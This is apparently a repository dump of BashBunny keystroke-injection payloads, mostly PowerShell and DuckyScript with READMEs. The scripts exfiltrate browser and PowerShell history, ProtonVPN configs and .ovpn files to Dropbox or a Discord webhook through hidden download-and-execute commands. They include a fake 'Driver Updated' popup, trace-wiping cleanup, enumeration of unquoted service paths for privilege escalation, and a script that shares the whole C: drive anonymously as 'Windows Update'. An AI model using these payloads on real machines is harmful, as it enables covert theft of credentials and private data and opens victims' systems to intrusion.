if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf)) {
try {
Write-Host "The Edge History file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Copy Edge History to Temp Directory to get sent to Dropbox
else {
$F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_history"
Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -Destination "$env:tmp/$F2"
}
function DropBox-Upload {
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "ADD-YOUR-DROPBOX-TOKEN-HERE" # Replace with your DropBox Access Token
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
DropBox-Upload -f "$env:tmp/$F1"
DropBox-Upload -f "$env:tmp/$F2"
$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1)
================================================
FILE: BashBunny/payloads/History-Pig/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;History+Pig!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# History-Pig
A payload to exfiltrate the history of the 2 most popular browsers
## Description
This payload will enumerate through the browser directories, looking for the file that stores the history
These files will be saved to the temp directory
Finally dropbox will be used to exfiltrate the files to cloud storage
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/History-Pig/payload.txt
================================================
REM Title: History-Pig
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate browsers history to a dropbox
REM Target: Windows 10, 11
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: BashBunny/payloads/OVPN-Hog/o.ps1
================================================
function OVPN-Hog {
[CmdletBinding()]
param (
[parameter(Position=0,Mandatory=$False)]
[string]$file,
[parameter(Position=1,Mandatory=$False)]
[string]$text
)
$hookurl = 'DISCORD-WEBHOOK'
$Body = @{
'username' = $env:username
'content' = $text
}
if (-not ([string]::IsNullOrEmpty($text))) {
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)
}
if (-not ([string]::IsNullOrEmpty($file))) {
curl.exe -F "file1=@$file" $hookurl
}
}
$Drive = "C:"
$Files = Get-ChildItem -Path $Drive -Filter "*.ovpn" -File -Recurse
if ($Files) {
$types = @{
"*.ovpn" = "OpenVPN"
}
foreach ($type in $types.Keys) {
$filteredFiles = $Files | Where-Object { $_.Name -like $type }
if ($filteredFiles) {
$zipFile = Join-Path -Path $env:TEMP -ChildPath "$($types[$type]).zip"
$filteredFiles | Compress-Archive -DestinationPath $zipFile
OVPN-Hog -file $zipFile -text "Uploading $($types[$type]) files"
}
}
}
================================================
FILE: BashBunny/payloads/OVPN-Hog/payload.txt
================================================
REM Title: Doc-Hog
REM Author: atomiczsec
REM Description: This payload will enumerate through the files looking for ".ovpn" files. Then create ZIPs with them, then send to a discord webhook.
REM Target: Windows 10
QUACK DELAY 2000
QUACK GUI r
QUACK DELAY 500
QUACK STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < URL HERE > dl=1; iex $pl
QUACK ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: BashBunny/payloads/OVPN-Hog/readme.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;OVPN-Hog!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#Getting-Started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# OVPN-Hog
A PowerShell script to search for and exfiltrate OpenVPN configuration files (.ovpn).
## Description
This script searches the entire C: drive of a Windows 10 or 11 machine for OpenVPN configuration files with the .ovpn extension. It then creates a zip archive containing the discovered files and uploads it to a Discord webhook.
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div align="center">
<a href="https://lnk.bio/atomiczsec">
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/sharethis-social-media-svgrepo-com.svg" width="48" height="48" alt="Link" />
</a>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/Powershell-History/PH.ps1
================================================
#Powershell-History
# See if file is a thing
Test-Path -Path "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -PathType Leaf
#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -PathType Leaf)) {
try {
Write-Host "The Powershell History file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Copy Powershell History to Temp Directory to get sent to Dropbox
else {
$F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_ps_history.txt"
Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination "$env:tmp/$F1"
}
function DropBox-Upload {
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN" # Replace with your DropBox Access Token
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
DropBox-Upload -f "$env:tmp/$F1"
$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1)
================================================
FILE: BashBunny/payloads/Powershell-History/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Powershell+History!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Powershell-History
A payload to exfiltrate the history of the powershell console
## Description
This payload will enumerate through the powershell directories, looking for the file that stores the history of the powershell console
These files will be saved to the temp directory
Finally dropbox will be used to exfiltrate the files to cloud storage
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/Powershell-History/payload.txt
================================================
REM Title: Powershell-History
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate powershells history to a dropbox, powershell is commonly used for IT automation
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: BashBunny/payloads/Printer-Recon/PR.ps1
================================================
function DropBox-Upload {
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
function Clean-Exfil {
# empty temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Empty recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
}
$F1 = "$env:tmp/$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_PrinterDriver.txt"
Get-Printer | Select-Object Name, Type, DriverName, Shared, Location > $F1
DropBox-Upload -f $F1
Clean-Exfil
================================================
FILE: BashBunny/payloads/Printer-Recon/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Printer+Recon!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Printer-Recon
## Description
This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/Printer-Recon/payload.txt
================================================
REM Title: Printer-Recon
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: BashBunny/payloads/Priv-Paths/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Priv+Paths!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Printer-Recon
## Description
A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook.
## Getting Started
### Dependencies
* Discord Webhook or other service that uses webhooks
* Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Command will be entered in the command prompt to search for unqouted service paths so you can later exploit them for priv esc
```
wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/Priv-Paths/payload.txt
================================================
REM Title: Priv-Paths
REM Author: atomiczsec
REM Description: A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook.
REM Target: Windows 10
Q DELAY 3000
Q GUI r
Q DELAY 1000
Q STRING cmd
Q ENTER
Q DELAY 500
Q STRING cd %HOMEPATH%
Q ENTER
Q DELAY 1000
Q STRING wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt
Q ENTER
Q DELAY 1000
Q STRING curl.exe -F "payload_json={\"username\": \"p\", \"content\": \"**Paths**\"}" -F "file=@p.txt" YOUR-DISCORD-WEBHOOK
Q ENTER
Q DELAY 200
Q STRING del p.txt
Q ENTER
Q DELAY 100
Q STRING exit
Q ENTER
================================================
FILE: BashBunny/payloads/Proton-Hog/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Proton+Hog!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Proton-Hog
A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information.
## Description
This payload will enumerate through the ProtonVPN directories, looking for the file that stores the userconfig file
Then dropbox will be used to exfiltrate the files to cloud storage
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/Proton-Hog/payload.txt
================================================
REM Title: Proton-Hog
REM Author: atomiczsec
REM Description: A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information.
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: BashBunny/payloads/Proton-Hog/s.ps1
================================================
function DropBox-Upload {
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
# Test the path to the ProtonVPN directory and if it is availible, change directory to where the user.config is stored
if (-not(Test-Path "$env:USERPROFILE\AppData\Local\ProtonVPN")) {
try {
Write-Host "The VPN folder has not been found. "
}
catch {
throw $_.Exception.Message
}
}
else {
$protonVpnPath = "$env:USERPROFILE\AppData\Local\ProtonVPN"
cd $protonVpnPath
Get-ChildItem | Where-Object {$_.name -Match "ProtonVPN.exe"} | cd
Get-ChildItem | cd
# Upload user.config to dropbox
DropBox-Upload -f "user.config"
}
================================================
FILE: BashBunny/payloads/Pwn-Drive/README.md
================================================
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/lock.png" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Pwn+Drive!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Pwn-Drive
A payload to share the victims "C:" drive to the network.
## Description
This payload will share the entire victims "C:" drive to the entire network for further exploitation.
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/Pwn-Drive/c.ps1
================================================
#Pwn-Drive
#Enable Network Discovery
netsh advfirewall firewall set rule group=”network discovery” new enable=yes
#Enable File and Print
netsh firewall set service type=fileandprint mode=enable profile=all
#Setting Registry Values for allowing access to drive without credentials
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name everyoneincludesanonymous -Value 1 -Force
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters\" -Name restrictnullsessacces -Value 0 -Force
#Sharing the Drive
New-SmbShare -Name "Windows Update" -Path "C:\"
================================================
FILE: BashBunny/payloads/Pwn-Drive/payload.txt
================================================
REM Title: Pwn-Drive
REM Author: atomiczsec
REM Description: This payload will share the entire victims "C:" drive to the entire network for further exploitation.
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: BashBunny/payloads/RanFunWare/README.md
================================================
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/WannaCry.png" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=RanFunWare!+😈¢er=true&size=30">
</a>
</h1>
